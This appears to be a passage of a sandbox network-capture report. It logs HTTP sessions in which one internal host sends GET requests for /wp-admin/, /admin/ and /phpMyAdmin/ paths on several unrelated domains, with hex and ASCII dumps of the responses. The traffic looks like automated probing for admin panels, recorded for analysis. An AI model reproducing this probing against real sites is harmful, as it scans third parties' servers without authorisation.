                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                454192.168.2.66378664.91.249.2080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.814578056 CET242OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: chainmine.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://ww7.chainmine.io/wp-login.php?usid=27&utid=4923817197
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.968126059 CET354INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Location: http://ww7.chainmine.io/wp-admin/?usid=27&utid=4923817362
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                455192.168.2.66386413.248.169.4880
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.859292984 CET174OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: secure.vexcorp.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.978429079 CET1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                ETag: "65b834cc-13b"
                                                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_aXUPmxwSErg5m19rL2QPQjF+gbWQghCDztDlHwIQHoRGJkUdRUVmjvMMWbWM351vi6MDobsQ+9dL3n+WJIJ5jw
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: country=RO;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                456192.168.2.663907162.241.203.3080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.953428984 CET170OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: nossoplayer.me
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.069029093 CET1114INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 06 Oct 2022 20:52:18 GMT
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1L*uD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p| 8J8-*QXXD,B"^#n$uP"8|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                457192.168.2.663780103.90.225.7080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.983119011 CET175OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ngoalongvn.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.335704088 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.335721016 CET119INData Raw: 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                458192.168.2.663975192.185.5.2380
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.021362066 CET169OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: multiideas.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.190249920 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.23.4
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Server-Cache: true
                                                                                                                                                                                                                                                                                                                                                                X-Proxy-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=5f28c8dc47747c998f6ab732b4b15eec; path=/
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 65 39 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec b2 6b 73 23 c9 95 25 f8 b9 d2 6c ff 83 57 c8 5a 95 39 4a 0f 84 3f c3 a3 8a a0 4c 55 ad de ee b1 66 8f 4c 8f 69 5b 53 c9 c6 40 20 92 88 aa 20 40 00 41 30 49 a9 fe fb 9e 73 3d 00 46 b2 52 a5 ec 69 cd ec ae d9 a6 31 1d 37 dc ef e3 dc 73 ce c5 e7 ff f8 df be f9 fd ff f5 9b 5f ab f5 70 db 5f be ba e0 8f ea 17 9b 9b 79 d1 6e f4 1f 7e 57 a8 65 bf 38 1c e6 c5 66 ab bf 3b 28 9c 87 e3 4d c1 c4 76 b1 c2 cf 6d 3b 2c d4 72 bd d8 1f da 61 5e fc e1 f7 ff a4 53 71 ba de 2c 6e db 79 71 ec da 87 bb ed 7e 40 a7 ed 66 68 37 48 7b e8 56 c3 7a be 6a 8f dd b2 d5 f2 f1 56 75 9b 6e e8 16 bd 3e 2c 17 7d 3b 37 6c d2 77 9b ef d5 be ed e7 c5 dd 7e fb ae eb db 42 ad f7 ed bb 79 31 9b dd dc de dd 94 db fd cd ec fd bb cd cc 30 fb d5 c5 61 b9 ef ee 86 cb d7 ef ee 37 cb a1 db 6e 5e 73 97 37 7f e6 59 ca 12 ff 06 3c 6a ae 3e bc 28 f7 ed 5d bf 58 b6 af 67 df 5e cb 8e df 5e cf de 7e f1 dd e1 8b 37 3f bc 79 bd da 2e ef 6f 01 b9 3c 05 bf ee 5b fe bc f9 ea 62 36 8e 7b 75 31 74 43 df 5e 5e dd f7 43 a7 fe 65 d5 2e 0e ea e7 3f 4b d6 98 af d4 7f bd 3f 0c 6a b1 d9 0e eb 76 af fe 7d bb 5f fd 66 df 1e 0e ea d0 0d ed c5 2c 97 4d b6 fc 62 b5 39 e8 3b 2c d8 0e cb f5 17 79 d5 2f 66 b3 77 60 ed 50 de 6c b7 37 7d bb b8 eb 0e e5 72 7b fb 85 9a 7d 42 e5 a1 7c 20 47 93 e4 17 3d 0f c3 62 e8 96 b9 e1 72 bf 3d 1c b6 fb ee a6 db e4 9e e8 07 c1 36 ed 72 78 31 ad 58 f4 43 bb df 2c 06 e8 31 3c de 41 e2 c5 dd 5d df 2d 17 24 7d b6 3f 1c 7e f1 fe b6 c7 13 f7 9b 17 1f f0 b2 5f ec ee b7 5f a9 7f 6a db d5 b3 96 b7 cc e8 98 40 24 b3 6e b3 6a df 97 77 eb bb d9 3b a4 cd 8a bf f7 f0 6f b6 b7 94 f0 f0 a9 28 96 63 fe 14 ce e7 5a ab df af bb 2c a5 ba 3f b4 07 05 8d d5 ff 29 22 a9 5f 6d 16 fd 23 88 3d a8 eb 47 75 b5 dd 1c 80 f8 5f 36 87 ee 66 8d a9 77 fd 3d 29 3e d6 65 5d 1a a5 d5 1f 0e dd e6 66 52 32 ec 17 cb ef 79 a5 d5 6c f6 f0 f0 50 de e6 06 dd d8 40 d0 29 ad 2f ff 8f 0c e3 df b6 43 fb e5 8f a6 00 1a 6c a7 96 f7 fb 3d b0 f7 8f 0a 52 be eb 6e ee f7 ed 4a 6d 37 00 3b 62 2f b1 46 9b b7 d8 3e 6c e0 d2 0d 96 04 88 ad 5a dc 63 a3 cd 40 66 5b f5 d0 0d eb 1f 6f d7 6d 64 eb 97 b3 0f ed 30 60 01 ac ba d8 b4 7d 49 ac 27 a8 ea 0f bf 02 92 55 cb 9c c9 0e b3 4f 62 4e f2 3f fb ec e2 b0 dc 77 77 c3 a8 fe d0 be 1f 66 df 2d 8e 8b 7c 5b 5c 22 e3 b3 07 a8 b7 7d 28 ff c7 c3 5d 7b bb fd ae fb dd 09 d0 5c fd b9 b8 5e 1c da 3f ec fb e2 cb 62 3d 0c 77 87 2f bf 9d 7d 3b 3b 94 0f e5 76 7f f3 ed ac bb 5d dc b4 87 6f a1 f9 be fd 76 26 c5 df ce 8c 29 6d 59 7d 3b ab ed fb da 7e 3b 2b de 16 98 89 fa f2 6e 73 83 8f c3 f1 e6 7f ae 1f 0a a5 1b 7e 7f 9d 1b 22 e2 f7 f6 7e bf 6c 8b 2f ff 5c 40 34 d2 cf b2 b1 bf b4 ff d0 aa df ce 1e ee 74 b7 59 f6 f7 2b 8e fa ee 20 17 52 a4 f7 6d 8f ac b6 bc ed 36 e5 77 87 5f 1e db fd 3c 94 a6 34 c5 0f 3f 7c 45 a2 3e 7f 77 bf 59 0e dd 76 f3 7a f1 f6 fa ed f2 cd 9f 4f df 6a c5 9b 37 7f 3e 2e f6 6a 39 ff dd 00 fb dd 94 ef f6 db db 6f d6 8b fd 37 50 f0 ab be 5c a2 f7 fe b7 ed 72 78 5d bd ad de 7e 5f 3e 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1e9bks#%lWZ9J?LUfLi[S@ @A0Is=FRi17s_p_yn~We8f;(Mvm;,ra^Sq,nyq~@fh7H{VzjVun>,};7lw~By10a7n^s7Y<j>(]Xg^^~7?y.o<[b6{u1tC^^Ce.?K?jv}_f,Mb9;,y/fw`Pl7}r{}B| G=br=6rx1XC,1<A]-$}?~__j@$njw;o(cZ,?)"_m#=Gu_6fw=)>e]fR2ylP@)/Cl=RnJm7;b/F>lZc@f[omd0`}I'UObN?wwf-|[\"}(]{\^?b=w/};;v]ov&)mY};~;+ns~"~l/\@4tY+ Rm6w_<4?|E>wYvzOj7>.j9o7P\rx]~_>t
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.190306902 CET1286INData Raw: ab 61 8d df 75 4b bd de bc ed cb 77 5d df ff 1e 64 bd 5e 96 8b bb bb fe f1 35 7d f7 76 f1 06 e9 d5 9b af d8 7b 35 ff be 1c b6 ff b8 18 16 7f f8 ed bf be 7e f3 9f e8 7a 3d e9 da be e8 ba 6f 87 fb 3d 76 9a cf e7 ed 0f e7 15 db d7 8b bc e0 f5 57 dd
